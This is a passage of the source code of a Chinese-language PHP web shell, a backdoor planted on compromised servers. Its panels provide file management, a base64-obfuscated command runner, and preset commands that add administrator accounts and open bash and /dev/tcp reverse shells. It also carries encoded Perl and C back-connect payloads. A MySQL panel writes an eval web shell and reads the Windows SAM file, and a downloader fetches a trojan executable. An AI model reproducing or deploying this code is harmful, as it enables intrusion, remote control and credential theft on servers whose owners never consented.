2124<input type=\"hidden\" id=\"file\" name=\"file\" value=\"undefined\">
2125<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"CheckAll(this.form);\">
2126<input type=\"button\" value=\"复制\" onclick=\"SubmitUrl('复制所选文件到路径: ','" . $REAL_DIR . "','a');return false;\">
2127<input type=\"button\" value=\"删除\" onclick=\"Delok('所选文件','b');return false;\">
2128<input type=\"button\" value=\"属性\" onclick=\"SubmitUrl('修改所选文件属性值为: ','0666','c');return false;\">
2129<input type=\"button\" value=\"时间\" onclick=\"CheckDate('" . $Filetime . "','d');return false;\">
2130<input type=\"button\" value=\"打包\" onclick=\"SubmitUrl('打包并下载所选文件下载名为: ','" . $path . '/' . $_SERVER['SERVER_NAME'] . ".tar.gz','e');return false;\">
2131目录(" . $NUM_D . ") / 文件(" . $NUM_F . ")</div>
2132</form> ");
2133 break;
2134
2135
2136 case "editr":
2137 echo("<script>");
2138 html_base();
2139 echo("</script>");
2140 css_js("2");
2141 if (!empty($_POST['uploadt'])) {
2142 echo @copy($_FILES['upfilet']['tmp_name'], str_path($p . '/' . $_FILES['upfilet']['name'])) ? html_a("?eanver=main", $_FILES['upfilet']['name'] . ' ' . $msg[2]) : msg($msg[3]);
2143 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . urlencode($p) . '">');
2144 }
2145
2146 if (!empty($_GET['redir'])) {
2147 $name = $_GET['name'];
2148 $newdir = str_path($p . '/' . $name);
2149 @mkdir($newdir, 0777) ? html_a("?eanver=main", $name . ' ' . $msg[0]) : msg($msg[1]);
2150 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . urlencode($p) . '">');
2151 }
2152 if (!empty($_GET['refile'])) {
2153 $name = $_GET['name'];
2154 $jspath = urlencode($p . '/' . $name);
2155 $pp = urlencode($p);
2156 $p = str_path($p . '/' . $name);
2157 $FILE_CODE = "";
2158 $charset = 'utf8';
2159 $FILE_TIME = date('Y-m-d H:i:s', time() + 3600 * 8);
2160 if (@file_exists($p)) {
2161 echo "发现目录下有\"同名\"文件,更换编码可以截入<br>";
2162 }
2163 } else {
2164 $jspath = urlencode($p);
2165 $FILE_TIME = date('Y-m-d H:i:s', filemtime($p));
2166 $FILE_CODE = file_get_contents($p);
2167 if (substr(PHP_VERSION, 0, 1) >= 5) {
2168 if (empty($_GET['charset'])) {
2169 if (TestUtf8($FILE_CODE) > 1) {
2170 $charset = 'UTF-8';
2171 $FILE_CODE = iconv("UTF-8", "utf8//IGNORE", $FILE_CODE);
2172 } else {
2173 $charset = 'utf8';
2174 }
2175 } else {
2176 if ($_GET['charset'] == 'utf8') {
2177 $charset = 'utf8';
2178 } else {
2179 $charset = $_GET['charset'];
2180 $FILE_CODE = iconv($_GET['charset'], "utf8//IGNORE", $FILE_CODE);
2181 }
2182 }
2183 }
2184 $FILE_CODE2 = $FILE_CODE;
2185 $FILE_CODE = htmlspecialchars($FILE_CODE);
2186 if ($FILE_CODE == "") {
2187 $FILE_CODE = htmlspecialchars($FILE_CODE2, ENT_COMPAT, 'ISO-8859-1');
2188 }
2189 }
2190 html_n("<div class=\"actall\">查找内容: <input name=\"searchs\" type=\"text\" value=\"\" style=\"width:500px;\">
2191<input type=\"button\" value=\"查找\" onclick=\"search(searchs.value)\"></div>
2192<form method='POST' id=\"editor\" action='?eanver=main&path=" . $pp . "'>
2193<div class=\"actall\">
2194<input type=\"text\" name=\"newfile\" id=\"newfile\" value=\"" . $p . "\" style=\"width:750px;\">指定编码:<input name=\"charset\" id=\"charset\" value=\"" . $charset . "\" Type=\"text\" style=\"width:80px;\" onkeydown=\"if(event.keyCode==13)window.location='?eanver=editr&p=" . $jspath . "&charset='+this.value;\">
2195<input type=\"button\" value=\"选择\" onclick=\"window.location='?eanver=editr&p=" . $jspath . "&charset='+this.form.charset.value;\" style=\"width:50px;\">");
2196 html_select(array("utf8" => "utf8", "UTF-8" => "UTF-8", "BIG5" => "BIG5", "EUC-KR" => "EUC-KR", "EUC-JP" => "EUC-JP", "SHIFT-JIS" => "SHIFT-JIS", "WINDOWS-874" => "WINDOWS-874", "ISO-8859-1" => "ISO-8859-1"), $charset, "onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");
2197 html_n("</div>
2198<div class=\"actall\"><textarea name=\"txt\" id=\"txt\" style=\"width:100%;height:380px;\">" . $FILE_CODE . "</textarea></div>
2199<div class=\"actall\">文件修改时间 <input type=\"text\" name=\"time\" id=\"mtime\" value=\"" . $FILE_TIME . "\" style=\"width:150px;\"> <input type=\"checkbox\" name=\"bin\" value=\"wb+\" size=\"\" checked>以二进制形式保存文件(建议使用)</div>
2200<div class=\"actall\"><input type=\"button\" value=\"保存\" onclick=\"CheckDate();\" style=\"width:80px;\"><input name='reset' type='reset' value='重置'>
2201<input type=\"button\" value=\"返回\" onclick=\"window.location='?eanver=main&path=" . $pp . "';\" style=\"width:80px;\"></div>
2202</form>");
2203 break;
2204 case "rename":
2205 html_n("<tr><td>");
2206 $newname = urldecode($pp) . '/' . urlencode($_GET['newname']);
2207 @rename($p, $newname) ? html_a("?eanver=main&path=$pp", urlencode($_GET['newname']) . ' ' . $msg[4]) : msg($msg[5]);
2208 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
2209 break;
2210 case "deltree":
2211 html_n("<tr><td>");
2212 delDirAndFile($p);
2213 !is_dir($p) ? html_a("?eanver=main&path=$pp", $p . ' ' . $msg[6]) : msg($msg[7]);
2214 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
2215 break;
2216 case "del":
2217 html_n("<tr><td>");
2218 delDirAndFile($p);
2219 !is_file($p) ? html_a("?eanver=main&path=$pp", $p . ' ' . $msg[6]) : msg($msg[7]);
2220 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
2221 break;
2222 case "copy":
2223 html_n("<tr><td>");
2224 $newpath = explode('/', $_GET['newcopy']);
2225 $pathr[0] = $newpath[0];
2226 for ($i = 1; $i < count($newpath); $i++) {
2227 $pathr[] = urlencode($newpath[$i]);
2228 }
2229 $newcopy = implode('/', $pathr);
2230 @copy($p, $newcopy) ? html_a("?eanver=main&path=$pp", $newcopy . ' ' . $msg[4]) : msg($msg[5]);
2231 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
2232 break;
2233 case "perm":
2234 html_n("<form method='POST'><tr><td>" . $p . " 属性为: ");
2235 if (is_dir($p)) {
2236 html_select(array("0777" => "0777", "0755" => "0755", "0555" => "0555"), $_GET['chmod']);
2237 } else {
2238 html_select(array("0666" => "0666", "0644" => "0644", "0444" => "0444"), $_GET['chmod']);
2239 }
2240 html_input("submit", "save", "修改");
2241 back();
2242
2243 if ($_POST['class']) {
2244 switch ($_POST['class']) {
2245 case "0777":
2246 $change = @chmod($p, 0777);
2247 break;
2248 case "0755":
2249 $change = @chmod($p, 0755);
2250 break;
2251 case "0555":
2252 $change = @chmod($p, 0555);
2253 break;
2254 case "0666":
2255 $change = @chmod($p, 0666);
2256 break;
2257 case "0644":
2258 $change = @chmod($p, 0644);
2259 break;
2260 case "0444":
2261 $change = @chmod($p, 0444);
2262 break;
2263 }
2264 $change ? html_a("?eanver=main&path=$pp", $msg[4]) : msg($msg[5]);
2265 die("<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=main&path=" . $pp . '">');
2266 }
2267 html_n("</td></tr></form>");
2268 break;
2269 case "info_f":
2270 $dis_func = get_cfg_var("disable_functions");
2271 $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
2272 if ($dis_func == "") {
2273 $dis_func = "No";
2274 } else {
2275 $dis_func = str_replace(" ", "<br>", $dis_func);
2276 $dis_func = str_replace(",", "<br>", $dis_func);
2277 }
2278 $phpinfo = (!preg_match("/phpinfo/", $dis_func)) ? "Yes" : "No";
2279 $info = array(array("服务器时间", date("Y-m-d h:i:s", time())), array("服务器域名", "<a href=\"http://" . $_SERVER['SERVER_NAME'] . "\" target=\"_blank\">" . $_SERVER['SERVER_NAME'] . "</a>"), array("服务器IP地址", gethostbyname($_SERVER['SERVER_NAME'])), array("服务器操作系统", PHP_OS), array("服务器操作系统文字编码", $_SERVER['HTTP_ACCEPT_LANGUAGE']), array("服务器解译引擎", $_SERVER['SERVER_SOFTWARE']), array("你的IP", get_proxy_ip()), array("Web服务端口", $_SERVER['SERVER_PORT']), array("PHP运行方式", strtoupper(php_sapi_name())), array("PHP版本", PHP_VERSION), array("运行于安全模式", Info_Cfg("safemode")), array("本文件路径", myaddress), array("允许使用 URL 打开文件 allow_url_fopen", Info_Cfg("allow_url_fopen")), array("允许使用curl_exec", Info_Fun("curl_exec")), array("允许动态加载链接库 enable_dl", Info_Cfg("enable_dl")), array("显示错误信息 display_errors", Info_Cfg("display_errors")), array("自动定义全局变量 register_globals", Info_Cfg("register_globals")), array("magic_quotes_gpc", Info_Cfg("magic_quotes_gpc")), array("程序最多允许使用内存量 memory_limit", Info_Cfg("memory_limit")), array("POST最大字节数 post_max_size", Info_Cfg("post_max_size")), array("允许最大上传文件 upload_max_filesize", $upsize), array("程序最长运行时间 max_execution_time", Info_Cfg("max_execution_time") . "秒"), array("被禁用的函数 disable_functions", $dis_func), array("phpinfo()", $phpinfo), array("目前还有空余空间diskfreespace", intval(diskfreespace(".") / (1024 * 1024)) . 
'Mb'), array("图形处理 GD Library", Info_Fun("imageline")), array("IMAP电子邮件系统", Info_Fun("imap_close")), array("MySQL数据库", Info_Fun("mysql_close")), array("SyBase数据库", Info_Fun("sybase_close")), array("Oracle数据库", Info_Fun("ora_close")), array("Oracle 8 数据库", Info_Fun("OCILogOff")), array("PREL相容语法 PCRE", Info_Fun("preg_match")), array("PDF文档支持", Info_Fun("pdf_close")), array("Postgre SQL数据库", Info_Fun("pg_close")), array("SNMP网络管理协议", Info_Fun("snmpget")), array("压缩文件支持(Zlib)", Info_Fun("gzclose")), array("XML解析", Info_Fun("xml_set_object")), array("FTP", Info_Fun("ftp_login")), array("ODBC数据库连接", Info_Fun("odbc_close")), array("Session支持", Info_Fun("session_start")), array("Socket支持", Info_Fun("fsockopen")),);
2280
2281 echo "<table width=\"100%\" border=\"0\">";
2282 for ($i = 0; $i < count($info); $i++) {
2283 echo "<tr><td width=\"40%\">" . $info[$i][0] . "</td><td>" . $info[$i][1] . "</td></tr>" . "\n";
2284 }
2285 $registry_proxystring = "";
2286 $Telnet = "";
2287 $PcAnywhere = "";
2288 $system = strtoupper(substr(PHP_OS, 0, 3));
2289 if ($system == "WIN") {
2290 try {
2291 $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
2292 $registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber");
2293 $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
2294 $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
2295 } catch (Exception $e) {
2296 }
2297 }
2298
2299 echo "<tr><td width=\"40%\">Terminal Service端口为</td><td>" . $registry_proxystring . "</td></tr>" . "\n";
2300 echo "<tr><td width=\"40%\">Telnet端口为</td><td>" . $Telnet . "</td></tr>" . "\n";
2301 echo "<tr><td width=\"40%\">PcAnywhere端口为</td><td>" . $PcAnywhere . "</td></tr>" . "\n";
2302 echo "</table>";
2303 break;
2304 case "cmd":
2305 $res = "回显窗口";
2306 $cmd = "whoami";
2307 if (!empty($_POST['cmd'])) {
2308 $res = Exec_Run(base64_decode($_POST['cmd']));
2309 $cmd = htmlspecialchars(base64_decode($_POST['cmd']));
2310 }
2311 html_n("<script language=\"javascript\">
2312function sFull(i){
2313 Str = new Array(11);
2314 Str[0] = \"dir\";
2315 Str[1] = \"net user envl envl /add\";
2316 Str[2] = \"net localgroup administrators envl /add\";
2317 Str[3] = \"netstat -ano\";
2318 Str[4] = \"ipconfig\";
2319 Str[5] = \"copy c:\\1.php d:\\2.php\";
2320 Str[6] = \"tftp -i " . $_SERVER["REMOTE_ADDR"] . "get server.exe c:\\server.exe\";
2321 Str[7] = \"0<&123;exec 123<>/dev/tcp/" . $_SERVER["REMOTE_ADDR"] . "/12666; sh <&123 >&123 2>&123\";
2322 Str[8] = \"bash -i >& /dev/tcp/" . $_SERVER["REMOTE_ADDR"] . "/12366 0>&1\";
2323 Str[9] = \"tasklist -svc\";
2324 Str[10] = \"netstat -tlnp\";
2325 document.getElementById('cmd').value = Str[i];
2326 return true;
2327}");
2328 html_base();
2329 html_n("function SubmitUrl(){
2330 document.getElementById('cmd').value = base64encode(document.getElementById('cmd').value);
2331 document.getElementById('gform').submit();
2332}
2333</script>
2334<form method=\"POST\" name=\"gform\" id=\"gform\" ><center><div class=\"actall\">执行命令新增很多隐藏函数,这个执行不了,除了反弹出来,绝对没有任何工具能执行命令!外加使用BASE64加密提交,防止被拦</div><div class=\"actall\">
2335命令参数 <input type=\"text\" name=\"cmd\" id=\"cmd\" value=\"" . $cmd . "\" onkeydown=\"if(event.keyCode==13)SubmitUrl();\" style=\"width:399px;\">
2336<select onchange='return sFull(options[selectedIndex].value)'>
2337<option value=\"0\" selected>--命令集合--</option>
2338<option value=\"1\">添加管理员</option>
2339<option value=\"2\">设为管理组</option>
2340<option value=\"3\">查看端口</option>
2341<option value=\"4\">查看地址</option>
2342<option value=\"5\">复制文件</option>
2343<option value=\"6\">FTP下载</option>
2344<option value=\"7\">Linux反弹</option>
2345<option value=\"8\">bash反弹</option>
2346<option value=\"9\">查看进程</option>
2347<option value=\"10\">Linux端口</option>
2348</select>
2349 <input type=\"button\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:80px;\">
2350</div>
2351<div class=\"actall\"><textarea name=\"show\" style=\"width:660px;height:399px;\">" . $res . "</textarea></div></center>
2352</form>");
2353 break;
2354 case "linux":
2355 $yourip = isset($_COOKIE['yourip']) ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR');
2356 $yourport = isset($_COOKIE['yourport']) ? $_COOKIE['yourport'] : "12388";
2357 $system = strtoupper(substr(PHP_OS, 0, 3));
2358 html_n("<div class=\"actall\">使用方法:<br>
2359 先在自己电脑运行\"nc -vv -l 12388\"<br>
2360 然后在此填写你电脑的IP,点连接!此反弹很全很实用!包括NC反弹!</div>
2361<form method=\"POST\" name=\"kform\" id=\"kform\">
2362<div class=\"actall\">你的地址 <input type=\"text\" name=\"yourip\" value=\"" . $yourip . "\" style=\"width:400px\"></div>
2363<div class=\"actall\">连接端口 <input type=\"text\" name=\"yourport\" value=\"" . $yourport . "\" style=\"width:400px\"></div>
2364<div class=\"actall\">执行方式 <select name=\"use\" >
2365<option value=\"perl\">Perl</option>
2366<option value=\"c\">C</option>
2367<option value=\"php\">PHP</option>
2368<option value=\"nc\">NC</option>
2369</select></div>
2370<div class=\"actall\"><input type=\"submit\" value=\"开始连接\" style=\"width:80px;\"></div></form>");
2371 if ((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) {
2372 setcookie('yourip', $_POST['yourip']);
2373 setcookie('yourport', $_POST['yourport']);
2374 echo "<div class=\"actall\">";
2375 if ($_POST['use'] == 'perl') {
2376 $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
2377 echo File_Write("/tmp/envl_bc", base64_decode($back_connect_pl), 'wb') ? "创建/tmp/envl_bc成功<br>" : "创建/tmp/envl_bc失败<br>";
2378 $perlpath = Exec_Run('which perl');
2379 $perlpath = $perlpath ? chop($perlpath) : 'perl';
2380 @unlink("/tmp/envl_bc.c");
2381 echo Exec_Run($perlpath . " /tmp/envl_bc " . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? "nc -vv -l " . $_POST['yourport'] : "执行命令失败";
2382 }
2383 if ($_POST['use'] == 'c') {
2384 $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
2385 echo File_Write("/tmp/envl_bc.c", base64_decode($back_connect_c), 'wb') ? "创建/tmp/envl_bc.c成功<br>" : "创建/tmp/envl_bc.c失败<br>";
2386 $res = Exec_Run("gcc -o /tmp/envl_bc /tmp/envl_bc.c");
2387 @unlink("/tmp/envl_bc.c");
2388 echo Exec_Run("/tmp/envl_bc " . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? "nc -vv -l " . $_POST['yourport'] : "执行命令失败";
2389 }
2390 if ($_POST['use'] == 'php') {
2391 if (!extension_loaded('sockets')) {
2392 if ($system == 'WIN') {
2393 @dl('php_sockets.dll') or die("Can't load socket");
2394 } else {
2395 @dl('sockets.so') or die("Can't load socket");
2396 }
2397 }
2398 if ($system == "WIN") {
2399 $env = array('path' => "c:\\windows\\system32");
2400 } else {
2401 $env = array('PATH' => "/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin");
2402 }
2403 $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
2404 $host = $_POST['yourip'];
2405 $port = $_POST['yourport'];
2406 $host = gethostbyname($host);
2407 $proto = getprotobyname("tcp");
2408 if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) {
2409 die("Socket创建失败");
2410 }
2411 if (($ret = socket_connect($sock, $host, $port)) < 0) {
2412 die("连接失败");
2413 } else {
2414 $message = "----------------------PHP反弹连接----------------------" . "\n";
2415 socket_write($sock, $message, strlen($message));
2416 $cwd = str_replace('\\', '/', dirname(__FILE__));
2417 while ($cmd = socket_read($sock, 65535, $proto)) {
2418 if (trim(strtolower($cmd)) == "exit") {
2419 socket_write($sock, "Bye\n");
2420 exit;
2421 } else {
2422 $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
2423 if (is_resource($process)) {
2424 fwrite($pipes[0], $cmd);
2425 fclose($pipes[0]);
2426 $msg = stream_get_contents($pipes[1]);
2427 socket_write($sock, $msg, strlen($msg));
2428 fclose($pipes[1]);
2429 $msg = stream_get_contents($pipes[2]);
2430 socket_write($sock, $msg, strlen($msg));
2431 $return_value = proc_close($process);
2432 }
2433 }
2434 }
2435 }
2436 }
2437 if ($_POST['use'] == 'nc') {
2438 echo "<div class=\"actall\">";
2439 $mip = $_POST['yourip'];
2440 $bport = $_POST['yourport'];
2441 $fp = fsockopen($mip, $bport, $errno, $errstr);
2442 if (!$fp) {
2443 $result = "Error: could not open socket connection";
2444 } else {
2445 fputs($fp, "\n*********************************************\n " . "is ok" . "\n*********************************************\n\n");
2446 while (!feof($fp)) {
2447 fputs($fp, "[Tr0yShell]> ");
2448 $result = fgets($fp, 4096);
2449 $message = `$result`;
2450 fputs($fp, "Shellresult:\n\n" . $message . "\n");
2451 }
2452 fclose($fp);
2453 }
2454 echo "</div>";
2455 }
2456 echo "<br>你可以尝试连接端口 (nc -vv -l " . $_POST['yourport'] . ') ';
2457 }
2458 break;
2459 case "sqlshell":
2460 $MSG_BOX = '';
2461 $mhost = 'localhost';
2462 $muser = 'root';
2463 $mport = '3306';
2464 $mpass = 'root';
2465 $mdata = 'mysql';
2466 $msql = "select version();";
2467 if (isset($_POST['mhost']) && isset($_POST['muser'])) {
2468 $mhost = $_POST['mhost'];
2469 $muser = $_POST['muser'];
2470 $mpass = $_POST['mpass'];
2471 $mdata = $_POST['mdata'];
2472 $mport = $_POST['mport'];
2473 if ($conn = @mysql_connect($mhost . ':' . $mport, $muser, $mpass)) {
2474 @mysql_select_db($mdata);
2475 } else {
2476 $MSG_BOX = "连接MYSQL失败";
2477 }
2478 }
2479 $downfile = "c:/windows/repair/sam";
2480 if (!empty($_POST['downfile'])) {
2481 $downfile = File_Str($_POST['downfile']);
2482 $binpath = bin2hex($downfile);
2483 $query = "select load_file(0x" . $binpath . ')';
2484 if ($result = @mysql_query($query, $conn)) {
2485 $k = 0;
2486 $downcode = '';
2487 while ($row = @mysql_fetch_array($result)) {
2488 $downcode .= $row[$k];
2489 $k++;
2490 }
2491 $filedown = basename($downfile);
2492 if (!$filedown) {
2493 $filedown = "envl.tmp";
2494 }
2495 $array = explode('.', $filedown);
2496 $arrayend = array_pop($array);
2497 header("Content-type: application/x-" . $arrayend);
2498 header("Content-Disposition: attachment; filename=" . $filedown);
2499 header("Content-Length: " . strlen($downcode));
2500 echo $downcode;
2501 exit;
2502 } else {
2503 $MSG_BOX = "下载文件失败";
2504 }
2505 }
2506 $o = isset($_GET['o']) ? $_GET['o'] : '';
2507 html_n("<script language=\"javascript\">
2508function nFull(i){
2509 Str = new Array(11);
2510 Str[0] = \"select version();\";
2511 Str[1] = \"select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile '" . str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']) . "/iis.txt'\";
2512 Str[2] = \"select '<?php eval(\$_POST['cmd']);?>' into outfile '" . str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']) . "/shell.php';\";
2513 Str[3] = \"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;\";
2514 nform.msql.value = Str[i];
2515 return true;
2516}");
2517 html_base();
2518 html_n("function SubmitUrl(){
2519 document.getElementById('msql').value = base64encode(document.getElementById('msql').value);
2520 document.getElementById('nform').submit();
2521}
2522</script>
2523<form method=\"POST\" name=\"nform\" id=\"nform\">
2524<center><div class=\"actall\"><a href=\"?eanver=sqlshell\">[MYSQL执行语句]</a>
2525<a href=\"?eanver=sqlshell&o=u\">[MYSQL上传文件]</a>
2526<a href=\"?eanver=sqlshell&o=d\">[MYSQL下载文件]</a></div>
2527<div class=\"actall\">
2528地址 <input type=\"text\" name=\"mhost\" value=\"" . $mhost . "\" style=\"width:110px\">
2529端口 <input type=\"text\" name=\"mport\" value=\"" . $mport . "\" style=\"width:110px\">
2530用户 <input type=\"text\" name=\"muser\" value=\"" . $muser . "\" style=\"width:110px\">
2531密码 <input type=\"text\" name=\"mpass\" value=\"" . $mpass . "\" style=\"width:110px\">
2532库名 <input type=\"text\" name=\"mdata\" value=\"" . $mdata . "\" style=\"width:110px\">
2533</div>
2534<div class=\"actall\" style=\"height:220px;\">");
2535 if ($o == 'u') {
2536 $uppath = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs";
2537 if (!empty($_POST['uppath'])) {
2538 $uppath = $_POST['uppath'];
2539 $query = "Create TABLE a (cmd text NOT NULL);";
2540 if (@mysql_query($query, $conn)) {
2541 if ($tmpcode = File_Read($_FILES['upfile']['tmp_name'])) {
2542 $filecode = bin2hex(File_Read($tmpcode));
2543 } else {
2544 $tmp = File_Str(dirname(myaddress)) . "/upfile.tmp";
2545 if (File_Up($_FILES['upfile']['tmp_name'], $tmp)) {
2546 $filecode = bin2hex(File_Read($tmp));
2547 @unlink($tmp);
2548 }
2549 }
2550 $query = "Insert INTO a (cmd) VALUES(CONVERT(0x" . $filecode . ",CHAR));";
2551 if (@mysql_query($query, $conn)) {
2552 $query = "SELECT cmd FROM a INTO DUMPFILE '" . $uppath . "';";
2553 $MSG_BOX = @mysql_query($query, $conn) ? "上传文件成功" : "上传文件失败";
2554 } else {
2555 $MSG_BOX = "插入临时表失败";
2556 }
2557 @mysql_query("Drop TABLE IF EXISTS a;", $conn);
2558 } else {
2559 $MSG_BOX = "创建临时表失败";
2560 }
2561 }
2562 html_n("<br><br>上传路径 <input type=\"text\" name=\"uppath\" value=\"" . $uppath . "\" style=\"width:500px\">
2563<br><br>选择文件 <input type=\"file\" name=\"upfile\" style=\"width:500px;height:22px;\">
2564</div><div class=\"actall\"><input type=\"submit\" value=\"上传\" style=\"width:80px;\">");
2565 } elseif ($o == 'd') {
2566 html_n("<br><br><br>下载文件 <input type=\"text\" name=\"downfile\" value=\"" . $downfile . "\" style=\"width:500px\">
2567</div><div class=\"actall\"><input type=\"submit\" value=\"下载\" style=\"width:80px;\">");
2568 } else {
2569 if (!empty($_POST['msql'])) {
2570 $msql = $_POST['msql'];
2571 $msql = base64_decode($msql);
2572 if ($result = @mysql_query($msql, $conn)) {
2573 $MSG_BOX = "执行SQL语句成功<br>";
2574 $k = 0;
2575 while ($row = @mysql_fetch_array($result)) {
2576 $MSG_BOX .= $row[$k];
2577 $k++;
2578 }
2579 } else {
2580 $MSG_BOX .= ":" . @mysql_error();
2581 }
2582 }
2583 html_n("<textarea name=\"msql\" id=\"msql\" style=\"width:700px;height:200px;\">" . $msql . "</textarea></div>
2584<div class=\"actall\">
2585<select onchange=\"return nFull(options[selectedIndex].value)\">
2586 <option value=\"0\" selected>显示版本</option>
2587 <option value=\"1\">导出文件</option>
2588 <option value=\"2\">写入文件</option>
2589 <option value=\"3\">开启外连</option>
2590</select>
2591<input type=\"button\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:80px;\">");
2592 }
2593 if ($MSG_BOX != '') {
2594 echo "</div><div class=\"actall\">" . $MSG_BOX . "</div></center></form>";
2595 } else {
2596 echo "</div></center></form>";
2597 }
2598 break;
2599 case "downloader":
2600 $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : "http://" . getenv('REMOTE_ADDR') . "/down/muma.exe";
2601 $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress) . "/muma.exe");
2602 html_n("<form method=\"POST\">
2603 <div class=\"actall\">超连接 <input name=\"durl\" value=\"" . $Com_durl . "\" type=\"text\" style=\"width:600px;\"></div>
2604 <div class=\"actall\">下载到 <input name=\"dpath\" value=\"" . $Com_dpath . "\" type=\"text\" style=\"width:600px;\"></div>
2605 <div class=\"actall\"><input value=\"下载\" type=\"submit\" style=\"width:80px;\"></div></form>");
2606 if ((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) {
2607 echo "<div class=\"actall\">";
2608 $contents = @implode('', @file($_POST['durl']));
2609 if (!$contents) {
2610 echo "无法读取要下载的数据";
2611 } else {
2612 echo File_Write($_POST['dpath'], $contents, 'wb') ? "下载文件成功" : "下载文件失败";
2613 }
2614 echo "</div>";
2615 }
2616 break;
2617 case "upfiles":
2618 html_n("<tr><td>服务器限制上传单个文件大小: " . @get_cfg_var('upload_max_filesize') . "<form method=\"POST\" enctype=\"multipart/form-data\">");
2619 html_input("text", "uppath", root_dir, "<br>上传到路径: ", "51");
2620 html_n("<SCRIPT language=\"JavaScript\">
2621function addTank(){
2622var k=0;
2623 k=k+1;
2624 k=tank.rows.length;
2625 newRow=document.all.tank.insertRow(-1)
2626 newcell=newRow.insertCell()
